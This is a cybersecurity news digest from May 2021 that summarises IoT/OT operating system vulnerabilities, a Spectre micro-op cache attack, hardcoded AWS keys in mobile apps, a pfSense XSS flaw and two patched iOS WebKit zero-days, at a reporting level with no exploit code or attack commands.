Cyber Pulse: Edition 151 | 5 May 2021

Microsoft warns of vulnerabilities in dozens of IoT operating systems

Microsoft researchers have discovered multiple memory allocation and remote code execution vulnerabilities in the operating systems for a wide range of commercial, medical and operational technology Internet of Things devices. The reported flaws affect at least 25 different products made by more than a dozen organisations, including Amazon, ARM, Google Cloud, Samsung, RedHat, Apache and others. As of now, exploits leveraging the vulnerabilities haven’t been spotted in the wild, but they offer potential attackers a broad surface area to do damage.

“Given the pervasiveness of IoT and OT devices, these vulnerabilities, if successfully exploited, represent a significant potential risk for organisations of all kinds,” Microsoft wrote.

Operational technology devices, hardware and machinery that connect to the internet and support medical facilities, enterprise businesses or critical infrastructure, differ substantially in their challenges from their commercial brethren. There are often technical obstacles to patching or updating, and any downtime has the potential to carry more direct or serious consequences for the delivery of medical care, power, water and other essential services. Meanwhile, the US National Security Agency (NSA) also released a cybersecurity advisory focusing on the security of operational technology (OT) systems, particularly in terms of connectivity to IT systems. The advisory shares recommendations for evaluating risks and improving the securing of connections between IT systems – which can often serve as an entry point into industrial networks – and OT systems.

“Each IT-OT connection increases the potential attack surface,” the NSA said. “To prevent dangerous results from OT exploitation, OT operators and IT system administrators should ensure only the most imperative IT-OT connections are allowed, and that these are hardened to the greatest extent possible.”

For maximum cyber safety, ideally there should be no connections between enterprise networks and OT networks, but the agency admits that in some cases such connections are necessary. Organisations should review these connections and remove ones that are not truly required, and ensure that the remaining connections are secure, to prevent them from being abused in malicious attacks.

Spectre side-channel attack concern returns

All defences against Spectre side-channel attacks can now be considered broken, leaving billions of computers and other devices just as vulnerable today as they were when the hardware flaw was first announced three years ago. A paper published on Friday by a team of computer scientists from the University of Virginia and the University of California, San Diego, describes how all modern AMD and Intel chips with micro-op caches are vulnerable to this new line of attack, given that it breaks all defences. That includes all Intel chips that have been manufactured since 2011, which all contain micro-op caches.

The vulnerability in question is called Spectre because it’s built into modern processors that perform branch prediction. It’s a technique that makes modern chips as speedy as they are by performing what’s called “speculative execution”, where the processor predicts instructions it might end up executing and prepares by following the predicted path to pull the instructions out of memory.

The new line of attacks exploits the micro-op cache: an on-chip structure that speeds up computing by storing simple commands and allowing the processor to fetch them quickly and early in the speculative execution process, as the team explains in a write-up from the University of Virginia. The new lines of attack demolish current defences because they only protect the processor in a later stage of speculative execution. The team was led by UVA Engineering Assistant Professor of Computer Science Ashish Venkat, who picked apart Intel’s suggested defence against Spectre, which is called LFENCE. That defence tucks sensitive code into a waiting area until the security checks are executed, and only then is the sensitive code allowed to execute, he explained.

“But it turns out the walls of this waiting area have ears, which our attack exploits. We show how an attacker can smuggle secrets through the micro-op cache by using it as a covert channel. It would be very difficult to create a focused attack looking for specific information,” he said. “Instead, attacks are expected to take the form of passive surveillance, collecting random information. That information is collected from deep inside the processor, though, and could contain anything processed by the computer.” 

The research team reported their findings to international chip makers in April and plan to present at the International Symposium on Computer Architecture, ISCA, which will be held virtually in June.

Leaking hardcoded private Amazon Web Services (AWS) keys

Most mobile app users tend to blindly trust that the apps they download from app stores are safe and secure. But that isn't always the case. The CloudSEK BeVigil search engine has identified over 40 apps – with more than a cumulative 100 million downloads – that had hardcoded private Amazon Web Services (AWS) keys embedded within them, putting their internal networks and their users' data at risk of cyberattacks. The AWS key leakage was spotted in some of the major apps such as Adobe Photoshop Fix, Adobe Comp, Hootsuite, IBM's Weather Channel, and online shopping services.

"AWS keys hardcoded in a mobile app source code can be a huge problem, especially if its Identity and Access Management role has wide scope and permissions," CloudSEK researchers said. "The possibilities for misuse are endless here, since the attacks can be chained and the attacker can gain further access to the whole infrastructure, even the code base and configurations."

CloudSEK said it responsibly disclosed these security concerns to AWS and the affected companies independently. In an app analysed by the cybersecurity firm, the exposed AWS key had access to multiple AWS services, including credentials for the S3 storage service, which in turn opened up access to 88 buckets containing 10,073,444 files and data amounting to 5.5 terabytes. Also included in the buckets were source code, application backups, user reports, test artefacts, configuration and credential files which could be used to gain deeper access to the app's infrastructure, including user databases.

"Hardcoded API keys are like locking your house but leaving the key in an envelope labelled 'Do not open,'" said Shahrukh Ahmad, CTO BeVigil. "These keys could easily be discovered by malicious hackers or competitors who could use them to compromise their data and networks."

XSS vulnerability patched in open source firewall pfSense

A severe cross-site scripting (XSS) vulnerability impacting pfSense software has been patched by the vendor. Netgate solutions’ pfSense software is an open-source offering based on FreeBSD for firewalling and routing, made available under an Apache 2.0 license. The XSS flaw, found in the services_wol.php function of the pfSense CE and pfSense Plus software WebGUI, was discovered and reported by Fortinet Systems Engineer William Costa. Tracked as CVE-2021-27933, the vulnerability was added to Full Disclosure. To exploit the bug, an attacker would need to inject code into the ‘Description’ parameter of the function. As there is a lack of proper encoding, malicious JavaScript could then be executed in a victim’s browser. XSS vulnerabilities come in a variety of flavours, some of the most severe being stored and persistent XSS, in which malicious code is injected into a target application and input is stored.

These bugs are used to manipulate browser sessions, circumvent same-origin policies, and can be exploited by attackers in a variety of scenarios including impersonating users, phishing, malicious payloads deployment, the theft of credentials and user data, and potentially the full hijack of a vulnerable application when a victim has high levels of privilege. The XSS flaw was acknowledged in release notes for pfSense 2.5.1 and pfSense Plus 21.02.2, which both contain a patch for the bug.

Apple reports 2 iOS zero-days that let hackers compromise fully patched devices

A week after Apple issued its biggest iOS and iPadOS update since last September’s release of version 14.0, the company has released a new update to patch two zero-days that allowed attackers to execute malicious code on fully up-to-date devices. Monday’s release of version 14.5.1 also fixes problems with a bug in the newly released App Tracking Transparency feature rolled out in the previous version. Both vulnerabilities reside in Webkit, a browser engine that renders Web content in Safari, Mail, App Store, and other select apps running on iOS, macOS, and Linux. CVE-2021-30663 and CVE-2021-30665, as the zero-days are tracked, have now been patched. Last week, Apple fixed CVE-2021-30661, another code-execution flaw in iOS Webkit, that also might have been actively exploited.

“Processing maliciously crafted web content may lead to arbitrary code execution,” Apple said in its security notes, referring to the flaws. “Apple is aware of a report that this issue may have been actively exploited.” MacOS 11.3.1, which Apple also released on Monday, also fixed CVE-2021-30663 and CVE-2021-30665.

CVE-2021-30665 was discovered by researchers from China-based security firm Qihoo 360. The other vulnerability was discovered by an anonymous source. Apple provided no details about who is using the exploits or who is being targeted by them. Apple rolled out App Tracking Transparency in last week’s release of iOS 14.5. The addition has roiled Facebook because it prevents the company’s app from tracking user activity across other apps users have installed without explicit permission.